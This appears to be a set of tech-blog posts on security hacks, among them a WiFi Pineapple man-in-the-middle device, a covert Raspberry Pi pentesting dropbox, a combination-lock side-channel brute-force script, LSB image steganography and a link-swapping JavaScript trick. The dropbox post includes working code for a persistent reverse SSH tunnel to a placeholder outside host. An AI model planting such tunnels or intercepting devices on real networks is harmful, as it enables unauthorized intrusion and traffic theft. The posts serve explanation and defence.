Wifi Pineapple Project Uses Updated Hardware For Man-in-the-middle Attacks

We’ve seen this small, cheap, and powerful WiFi router before. But this time it’s up to no good. [Andy] used a TP-Link WR703N to build an upgraded WiFi Pineapple hacking tool.

A WiFi Pineapple is a device spawned years ago by the Hak5 team (here's a clip showing off the device). At its heart is a WiFi router that answers every probe request, whatever SSID is asked for. If your laptop or smart phone has a network saved and sends out probes looking for that SSID, the Pineapple replies as if it were that access point and lets the client associate, with no interaction from the victim. From then on all of the client's traffic passes through the attacker's box, which provides the chance to sniff and alter it in a classic man-in-the-middle attack. Anything sent in the clear is fully exposed; TLS-protected sessions are a harder target and will normally throw certificate warnings if the attacker tries to interpose.

[Andy] is recreating the device at a rock-bottom price. He picked up the router for about $20 and added an $8 USB drive for storage. The only other things you would need are a power source and a way to hide the hardware. The code used in the Hak5 version is available for download, and that's what he started from after flashing OpenWrt to the device.

[Thanks Midnite]

Hackerspace Security System Brings RFID, Video Feedback, And Automatic Doors


[Will] has been hard at work on a replacement system for his Hackerspace’s RFID door lock. The original is now several years old and he’s decided to upgrade to a much more powerful processor, adding some bells and whistles along the way.

The control box seen above is the exterior component of the system. It's a telephone service box like you'd find on the back of most houses in the US. They had a few of these lying around, and they're a perfect choice because... well... they're meant to be locking enclosures that brave the elements. [Will] made the jump from the Arduino that has run the locks for the last three years to a Raspberry Pi board. That gives him a lot of extra power to work with, and he took advantage of it by adding a vehicle backup-camera LCD for visual feedback. You can see it giving the 'Access Granted' message he used during testing, but the demo video after the break shows that they plan to do some image scripting to display a head shot of the RFID tag's owner whenever a tag is read.

There are several other features included as well. The system Tweets whenever a tag is read, helping the members keep tabs on who is hanging out at the space right now (keep in mind that a public feed of who is present also tells anyone watching when the space is empty). It also patches into a sliding door which one of the members automated using a garage door opener motor.


Combo Lock Uses Relays And Logic Gates


Here’s a really fascinating circuit that implements a combination lock using relays and logic gates. Even with the schematic and written explanation of how it works we’re still left somewhat in the dark. We’ll either pull out some paper and do it by hand this weekend, or build it chunk by chunk in a simulator like Atanua. Either way, the project sparked our interest enough that we want to get elbow deep into its inner workings.

From the description we know that it uses a combination of CD4017, CD4030, CD4072, and CD4081 chips. You're probably familiar with the 4017, a decade counter popular in a lot of projects. The other chips provide XOR, OR, and AND gates respectively. The relays serve two purposes. One of them activates when the correct combination has been entered, effectively serving as the output of the combo lock. The other two activate the clock and effect a reset if the wrong combination is entered.

It makes us wonder whether it would be easy to brute force the combination by listening for the reset relay clicking. If the relay fires as soon as a wrong digit goes in, that sound is an oracle confirming each digit on its own, and the search collapses from every possible combination to at most ten tries per position. It's hard to tell from the video after the break whether you can discern a wrong digit from a right one just based on the sound.
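To put a number on that, here is an added example (ours, not the author's schematic) that models the lock as a counter which advances on each correct digit and fires the reset relay the moment a wrong one arrives. The attacker hears only the click, and the assumptions are a 10-digit keypad and a known combination length:

```python
"""Added example: why an audible reset relay is a side channel.

RelayLock is a model written for this page, not the author's circuit: a
4017-style counter advances on each correct digit and a wrong digit fires
the reset relay immediately.  If that relay can be heard, the attacker
learns the combination digit by digit instead of combination by combination.
Assumed: a 10-digit keypad and a combination of known length.
"""


class RelayLock:
    def __init__(self, combination, digits=10):
        self.combination = list(combination)
        self.digits = digits
        self.position = 0        # how many digits have matched so far
        self.keypresses = 0
        self.reset_clicks = 0

    def press(self, digit):
        """Enter one digit. Returns (opened, reset_click_heard)."""
        self.keypresses += 1
        if self.combination[self.position] == digit:
            self.position += 1
            if self.position == len(self.combination):
                self.position = 0            # output relay fires, counter restarts
                return True, False
            return False, False
        self.position = 0                    # reset relay fires: audible click
        self.reset_clicks += 1
        return False, True


def oracle_attack(lock, length):
    """Recover the combination using only the reset relay's click as feedback."""
    known = []            # digits confirmed so far
    counter = 0           # attacker's model of where the lock's counter sits
    while len(known) < length:
        for d in range(lock.digits):
            if counter != len(known):        # a click reset the lock: replay the prefix
                for p in known:
                    lock.press(p)
                counter = len(known)
            opened, click = lock.press(d)
            if opened:
                return known + [d]
            if click:
                counter = 0
                continue
            known.append(d)                  # silence means the digit was accepted
            counter += 1
            break
        else:
            raise RuntimeError("no digit accepted; the model does not match this lock")
    return known


def blind_worst_case(length, digits=10):
    """Keypresses to try every combination when there is no per-digit feedback."""
    return digits ** length * length


def oracle_worst_case(length, digits=10):
    """Upper bound for the click-oracle attack: at position i each of the
    `digits` guesses costs at most i+1 presses (replay the prefix, then guess)."""
    return sum(digits * (i + 1) for i in range(length))


# Constructed sample: a four-digit lock. The attacker never sees SECRET.
SECRET = [7, 3, 0, 9]

if __name__ == "__main__":
    lock = RelayLock(SECRET)
    found = oracle_attack(lock, len(SECRET))
    print(f"recovered {found} in {lock.keypresses} keypresses "
          f"({lock.reset_clicks} clicks heard); blind worst case is "
          f"{blind_worst_case(len(SECRET))}, oracle bound {oracle_worst_case(len(SECRET))}")
```

With four digits the blind search is 10^4 combinations times four presses each, while the click oracle is bounded by 100 presses; the sample combination falls in 53. The fix is what every serious lock does: only evaluate the whole entry, and reset (silently or not) after the full length regardless of where the mistake was.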


Home Security Hardware Makes You The Monitoring Service


[Nick] and [Simon] both have home security systems with a monitoring service that calls whenever an alarm is tripped. For [Simon] this ends up happening a lot, and he wanted to change the circumstances that would trigger a call. Because of company policy the service is inflexible, so he and [Nick] went to work cutting them out of the loop. What they came up with is this custom electronics board, which monitors the security system and calls or texts them accordingly.

They started with the self-monitoring alarm system design we looked at back in September. This led to the inclusion of the SIM900 GSM modem, which is a really cheap way to get your device onto the cellular network. The board also emulates the phone line the alarm panel expects to dial out on, and uses a DTMF touch-tone decoder to read what the panel sends, which keeps the security system happy. [Simon] highlights several changes he made to the design, as well as the reasons for them. One idea he has for a possible revision is to do away with the MT8870 chip which handles the touch tones. He thinks it may be possible to use the SIM900's DTMF features to do that work instead.
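For a sense of what the MT8870 is doing, here is an added example (not the project's code) that decodes touch tones in software with the Goertzel algorithm. The audio is synthesized inline rather than captured from a phone line, and the frame size and power threshold are our choices:

```python
"""Added example: decoding DTMF touch tones in software with Goertzel.

This is not [Simon]'s code; it shows the job the MT8870 does, so it is
clear what "use the modem's DTMF features instead" would have to replace.
The test signal is synthesized here (constructed sample), not captured.
"""
import math

RATE = 8000          # samples/s, telephone-band audio
FRAME = 205          # classic Goertzel DTMF frame: ~39 Hz bins at 8 kHz
LOW = (697, 770, 852, 941)
HIGH = (1209, 1336, 1477, 1633)
KEYPAD = ("123A", "456B", "789C", "*0#D")   # rows follow LOW, columns HIGH
MIN_POWER = 500.0    # ~1/5 of a full frame of a 0.5-amplitude tone pair (assumed):
                     # a frame must hold roughly half a tone to count


def goertzel_power(samples, freq, rate=RATE):
    """Energy of `samples` at the DFT bin nearest `freq`, without a full FFT."""
    n = len(samples)
    k = round(n * freq / rate)
    coeff = 2.0 * math.cos(2.0 * math.pi * k / n)
    s1 = s2 = 0.0
    for x in samples:
        s1, s2 = x + coeff * s1 - s2, s1
    return s1 * s1 + s2 * s2 - coeff * s1 * s2


def decode_frame(frame):
    """Return the key for one frame, or None if it is not a clean DTMF pair."""
    low = [goertzel_power(frame, f) for f in LOW]
    high = [goertzel_power(frame, f) for f in HIGH]
    row, col = low.index(max(low)), high.index(max(high))
    if low[row] < MIN_POWER or high[col] < MIN_POWER:
        return None
    # a second strong tone in the same group means noise or speech, not a key
    if sorted(low)[-2] > low[row] / 4 or sorted(high)[-2] > high[col] / 4:
        return None
    return KEYPAD[row][col]


def decode_sequence(samples):
    """Frame the stream and emit a key each time a new tone starts."""
    keys, prev = [], None
    for start in range(0, len(samples) - FRAME + 1, FRAME):
        key = decode_frame(samples[start:start + FRAME])
        if key is not None and key != prev:
            keys.append(key)
        prev = key
    return "".join(keys)


def synthesize(keys, tone_ms=80, gap_ms=40, rate=RATE):
    """Constructed test signal: each key as its two tones, then silence."""
    out = []
    for key in keys:
        row = next(r for r, chars in enumerate(KEYPAD) if key in chars)
        f_low, f_high = LOW[row], HIGH[KEYPAD[row].index(key)]
        for i in range(rate * tone_ms // 1000):
            t = i / rate
            out.append(0.5 * math.sin(2 * math.pi * f_low * t)
                       + 0.5 * math.sin(2 * math.pi * f_high * t))
        out.extend([0.0] * (rate * gap_ms // 1000))
    return out


if __name__ == "__main__":
    print(decode_sequence(synthesize("1234#")))   # the panel's dialled digits
```

Eight Goertzel filters per frame is cheap enough for a small microcontroller, which is the real point: whether the MT8870 stays or goes, the panel's dial-out string can be recovered from the audio and acted on locally.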

Images Carrying An Encrypted Data Payload


This is a tidy-looking banner image. But according to [Ian] it contains 52KB of source code. You can't just read all of that data out. Well, you can, but it will be gibberish. Before hiding the bits in plain sight he encrypted them with two different keys.

He's using AES-256 encryption to keep his data away from prying eyes. But if that wasn't enough, he also wrote a PHP program to hide the bits in a PNG image. Not just any picture will do (otherwise your eye will be able to see that something's awry). The post linked above focuses mainly on how to choose an image that will hide your data most easily. We asked him if he would share his technique for actually merging the encrypted file with the picture, and he delivered. Head on over to his repository if you want to take a look at the generator code. One thing to keep in mind with any scheme like this: the carrier has to stay lossless, so the payload survives a PNG copy but not a resize or a trip through JPEG.
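To make the merging step concrete, here is an added example of one common approach, least-significant-bit embedding. It is ours, not [Ian]'s PHP generator: the image is a flat buffer of 8-bit channel samples (what you get from a decoded PNG), the payload is assumed to already be ciphertext, and the length header and the SHA-256-derived stand-in payload are our constructions:

```python
"""Added example: hiding a (pre-encrypted) byte string in the least-significant
bits of an image buffer and pulling it back out.  Stdlib only; not [Ian]'s code.

The "image" is a flat bytearray of 8-bit channel samples (e.g. Pillow's
Image.tobytes()).  The payload is assumed to already be AES-256 ciphertext,
so it is treated as opaque bytes.  A 4-byte big-endian length header is our
own framing convention.
"""
import hashlib
import struct

HEADER = struct.Struct(">I")     # payload length, embedded ahead of the payload


def capacity(samples: bytes) -> int:
    """Payload bytes that fit with one bit per sample, after the header."""
    return len(samples) // 8 - HEADER.size


def embed(samples: bytes, payload: bytes) -> bytearray:
    """Write header+payload, MSB first, into the LSB of successive samples."""
    if len(payload) > capacity(samples):
        raise ValueError(f"payload {len(payload)} B exceeds capacity {capacity(samples)} B")
    out = bytearray(samples)
    data = HEADER.pack(len(payload)) + payload
    for i, byte in enumerate(data):
        for b in range(8):
            idx = i * 8 + b
            out[idx] = (out[idx] & 0xFE) | ((byte >> (7 - b)) & 1)
    return out


def extract(samples: bytes) -> bytes:
    """Read the header, sanity-check it, then read that many payload bytes."""
    def read(nbytes, offset):
        result = bytearray()
        for i in range(nbytes):
            value = 0
            for b in range(8):
                value = (value << 1) | (samples[offset + i * 8 + b] & 1)
            result.append(value)
        return bytes(result)

    length = HEADER.unpack(read(HEADER.size, 0))[0]
    if length > capacity(samples):
        raise ValueError("no valid payload header in these samples")
    return read(length, HEADER.size * 8)


def lsb_ones_ratio(samples: bytes) -> float:
    """Fraction of samples whose LSB is 1.  Ciphertext is random-looking, so
    embedding it pushes this toward 0.5; in a cover whose LSBs were strongly
    biased that shift is exactly what a steganalysis pass looks for."""
    return sum(s & 1 for s in samples) / len(samples)


# Constructed cover: 4096 samples with every LSB cleared, i.e. a worst-case
# carrier where any embedding is statistically obvious.
COVER = bytes(((i * 37) % 256) & 0xFE for i in range(4096))
# Constructed stand-in for 64 bytes of ciphertext (not real AES output).
PAYLOAD = hashlib.sha256(b"stand-in for AES-256 ciphertext").digest() * 2

if __name__ == "__main__":
    stego = embed(COVER, PAYLOAD)
    assert extract(stego) == PAYLOAD
    print(f"capacity {capacity(COVER)} B, LSB ones ratio "
          f"{lsb_ones_ratio(COVER):.3f} -> {lsb_ones_ratio(stego):.3f}")
```

With a real file you would feed `Image.open(path).tobytes()` in and rebuild with `Image.frombytes(mode, size, data)` before saving as PNG. The ones-ratio function is the caveat that goes with the "choose the right image" advice: noisy photos already have near-random LSBs and absorb ciphertext quietly, while flat graphics with clean LSBs betray it even though the eye sees nothing.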

Rogue Pi: A RPi Pentesting Dropbox


A pentesting dropbox is used to allow a pentester to remotely access and audit a network. The device is dropped onto a network, and then sets up a connection which allows remote access. As a final project, [Kalen] built the Rogue Pi, a pentesting dropbox based on the Raspberry Pi.

The Rogue Pi has a few features that make it helpful for pentesting. First off, it has a power-on test that verifies the installation onto the target network was successful. Since the install of a dropbox needs to be inconspicuous, this helps get the device set up without being detected. An LCD lets the user see whether the installation succeeded without needing another computer or an external display.

Once powered on, the device opens a reverse SSH tunnel to a host the pentester controls, which provides remote access to the device. The tunnel gets around the target network's firewall because the connection is outbound from the inside; the tester then rides it back in rather than trying to reach the Pi from outside. Aircrack-ng is included for wireless attacks, and a hidden SSID provides wireless access if the wired network has issues (hidden in name only: the SSID still appears in probe and association frames to anyone sniffing, so don't count on it to keep the box unnoticed). There is a long list of pentesting tools that have been built to run on the Pi.
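As an added example of the tunnel side (ours, not [Kalen]'s code), here is a small supervisor that drives the stock OpenSSH client with the options a dropbox needs and restarts it with backoff when the link drops. The listener host, user, key path and ports are placeholders:

```python
"""Added example: supervising the reverse SSH tunnel a dropbox phones home on.

Not the Rogue Pi's code.  It wraps the stock OpenSSH client: `ssh -R` asks
the listener to open a port that is forwarded back down the tunnel to the
dropbox's own sshd, so the tester connects to the listener, not to the box.
Host, user, key path and port numbers below are placeholders.
"""
import subprocess
import time

LISTENER = "ops@tunnel.example.net"      # placeholder: host the tester controls
REMOTE_PORT = 2222                       # opened on the listener's loopback
LOCAL_SSH = 22                           # the dropbox's own sshd
KEY = "/home/pi/.ssh/dropbox_ed25519"    # placeholder key path


def tunnel_command(listener=LISTENER, remote_port=REMOTE_PORT,
                   local_port=LOCAL_SSH, key=KEY):
    """argv for an outbound-only, self-checking reverse tunnel."""
    return [
        "ssh", "-N",                           # forwarding only, no remote shell
        "-i", key,
        "-R", f"{remote_port}:localhost:{local_port}",
        "-o", "ExitOnForwardFailure=yes",      # die (and get restarted) if the port is taken
        "-o", "ServerAliveInterval=30",        # notice a silently dropped link
        "-o", "ServerAliveCountMax=3",
        "-o", "StrictHostKeyChecking=yes",     # pin the listener; a MITM'd tunnel is a bad day
        "-o", "BatchMode=yes",                 # never block on a prompt, unattended
        listener,
    ]


def next_backoff(current, cap=300):
    """Exponential backoff between reconnect attempts, capped at `cap` seconds."""
    return min(max(current * 2, 5), cap)


def supervise(run=subprocess.call, sleep=time.sleep, max_restarts=None):
    """Run the tunnel forever (or `max_restarts` times), backing off on failure.
    `run` and `sleep` are injectable so the loop can be exercised offline."""
    delay, restarts = 5, 0
    while max_restarts is None or restarts < max_restarts:
        started = time.monotonic()
        run(tunnel_command())
        if time.monotonic() - started > 60:    # a link that held for a while resets backoff
            delay = 5
        sleep(delay)
        delay = next_backoff(delay)
        restarts += 1
    return restarts


if __name__ == "__main__":
    supervise()
```

On the listener, pin that key down in `authorized_keys` with `restrict,permitlisten="2222"` so the dropbox's credential can open exactly one reverse port and nothing else; the tester then reaches the box with `ssh -p 2222 pi@localhost` from the listener. Because `-R` binds to loopback by default, the port is not exposed to the wider internet.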

Check out a video demonstration of the dropbox after the break.


HTML Link Tag Hack Sends You To The Wrong Place


We consider ourselves fairly cautious Internet warriors. We know when to watch out for malicious links and tread lightly during those times. But this hack will still bite even the most cautious of link followers. It's a hack that changes where a link is sending you after you click on it.

The concept is driven home right away by a link in the post: hover over it and your browser's status bar lists PayPal as the target, but clicking it lands you on a page warning that it could just as easily have been something malicious. The trick is that the href the browser previews is genuine; a click (or mousedown) handler swaps it for a different URL an instant before the navigation happens, so the preview and the destination never match. Of course the address line of the page shows that you were sent somewhere else, but it's still an interesting issue. The hack takes just a few lines of JavaScript. In fact, the original example was 100 characters, and a revision boils that down to just 67.

So who's vulnerable to this kind of thing? It sounds like everyone that's not using the Opera browser, which has been patched against the exploit. There are also some updates at the bottom of the post which mention that Firefox has been notified about it and Chrome is working on a patch. Whatever your browser does, the lesson holds: the hover preview is a convenience, not a security control, so judge a link by the address bar after you land, not the status bar before you click.

[via Reddit]